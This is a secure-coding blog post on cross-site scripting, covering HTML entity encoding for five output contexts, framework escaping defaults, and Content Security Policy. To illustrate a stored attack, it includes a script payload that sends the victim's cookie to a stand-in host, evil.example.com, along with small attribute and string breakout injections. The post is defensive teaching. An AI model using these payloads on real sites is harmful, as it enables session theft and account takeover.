XSS and HTML Encoding: The Five Contexts That Require Different Escaping
XSS is still the most common web vulnerability β and unescaped HTML is the mechanism. Here's how cross-site scripting actually works, the five encoding contexts that require different treatment, why React is safe by default but PHP isn't, and how CSP adds a second layer.
By sadiqbd Β· June 9, 2026
Cross-site scripting is still the most common web vulnerability β and unescaped HTML is the mechanism
Cross-site scripting (XSS) has appeared in the OWASP Top 10 list of web vulnerabilities for over two decades. It was third in 2021. The attack is conceptually simple: inject malicious HTML or JavaScript into a page that other users view. The reason it persists is that every place user input is reflected in a web page is a potential injection point β and there are always more injection points than developers remember.
HTML entity encoding is one of the core defences. Understanding it, and understanding when it's not sufficient, is foundational to web security.
How XSS works
The basic stored XSS attack:
- An attacker submits content to a website:
<script>document.location='https://evil.example.com/steal?cookie='+document.cookie;</script> - The website stores this content in a database (a comment, a username, a product description)
- When another user views the page, the server renders the stored content into the HTML
- The browser executes the
<script>tag as JavaScript - The attacker receives the victim's session cookie and can impersonate them
The defence: never render user-controlled content as raw HTML. HTML-encode it first so that <script> becomes <script> β displayed as literal text, not executed as code.
HTML entities: the complete encoding map
HTML special characters that must be encoded:
| Character | Entity name | Entity number | Role in HTML |
|---|---|---|---|
< |
< |
< |
Opens tags |
> |
> |
> |
Closes tags |
& |
& |
& |
Begins entities |
" |
" |
" |
Delimits attribute values |
' |
' |
' |
Delimits attribute values (HTML5) |
/ |
β | / |
Can close tags |
The minimum for HTML body context: encode <, >, and &.
For HTML attribute values: also encode " and ' (whichever delimits the attribute).
The most critical: & must always be encoded first, before encoding the others. Otherwise < β < and then the & in < gets encoded again β &lt; (double encoding).
The five encoding contexts
Different contexts in HTML require different encoding β this is where many XSS defences fail. Encoding correctly for one context doesn't protect another.
Context 1: HTML body
User content rendered between HTML tags:
<p>User input here: ENCODE FOR HTML</p>
Encode: < β <, > β >, & β &
Context 2: HTML attribute (double-quoted)
<input value="ENCODE FOR ATTRIBUTE">
Encode all HTML entities AND " β "
An attacker could inject: " onmouseover="alert(1) β which becomes a second attribute executing JavaScript. Encoding the quote character prevents the attribute from being closed early.
Context 3: JavaScript string
<script>
var username = "ENCODE FOR JAVASCRIPT";
</script>
HTML encoding is NOT sufficient here. JavaScript strings require JavaScript encoding: \ β \\, " β \", ' β \', newlines β \n. Many frameworks have separate functions for this context.
An attacker could inject: "; alert(1); // β closing the string, executing a new statement, and commenting out the remainder.
Context 4: URL context
<a href="https://example.com/search?q=ENCODE FOR URL">
URLs require percent-encoding for user-controlled values: space β %20, < β %3C, > β %3E. Using HTML entities in a URL context doesn't prevent injection.
Context 5: CSS context
<div style="background-color: USER_INPUT">
CSS values can contain expression() and other mechanisms that execute JavaScript in older browsers. User input should never be placed in CSS values without strict validation and encoding.
Why HTML encoding alone isn't enough: CSP
HTML encoding prevents injection when applied correctly to every context. But correctly applying context-appropriate encoding to every reflection point in a complex application is difficult β any missed location is a vulnerability.
Content Security Policy (CSP) provides a second layer: it tells the browser which sources of scripts, styles, and other resources are legitimate. A strict CSP rejects inline scripts entirely:
Content-Security-Policy: default-src 'self'; script-src 'nonce-{random}' 'strict-dynamic'; object-src 'none';
With a nonce-based CSP, <script> tags without the correct nonce don't execute β even if an attacker successfully injects them. This makes many XSS attacks ineffective even when encoding is missed.
Common framework encoding behaviours
React: JSX automatically escapes all user-controlled values rendered as text. {userInput} is HTML-encoded. The exception: dangerouslySetInnerHTML bypasses encoding entirely β its name is deliberate.
Django templates: auto-escaping is enabled by default. {{ user_input }} is HTML-encoded. The |safe filter disables encoding β only use it for content you've verified is safe.
Jinja2: auto-escaping is disabled by default for non-HTML extensions. Enable it explicitly with autoescape=True for HTML templates.
PHP echo: no escaping. Always use htmlspecialchars($input, ENT_QUOTES, 'UTF-8') before outputting user input.
How to use the HTML Entities tool on sadiqbd.com
Encoding:
- Paste text containing special characters
- Encode β
<script>alert(1)</script>becomes<script>alert(1)</script> - Use the encoded output for safe HTML display
Decoding:
- Paste HTML-encoded text
- Decode β
&lt;becomes<(or further decode to<) - Use for reading encoded content in HTML source
Frequently Asked Questions
Why do I see both < and < for the same character?
Both represent the same character (<) β one uses a named entity reference, the other uses a numeric character reference (decimal). All modern browsers handle both identically. Named entities are more readable; numeric references work for characters without named equivalents.
Is URL encoding the same as HTML encoding?
No β they're different encoding systems for different contexts. < is < in HTML encoding and %3C in URL percent-encoding. Using the wrong encoding for the wrong context doesn't prevent injection.
Is the HTML Entities tool free? Yes β completely free, no sign-up required.
HTML entity encoding is one layer of XSS defence. Applied correctly to every rendering context, it prevents the direct injection mechanism. Combined with CSP, it provides defence in depth against one of the web's most persistent vulnerability classes.
Try the HTML Entities tool free at sadiqbd.com β encode or decode HTML entities for any text instantly.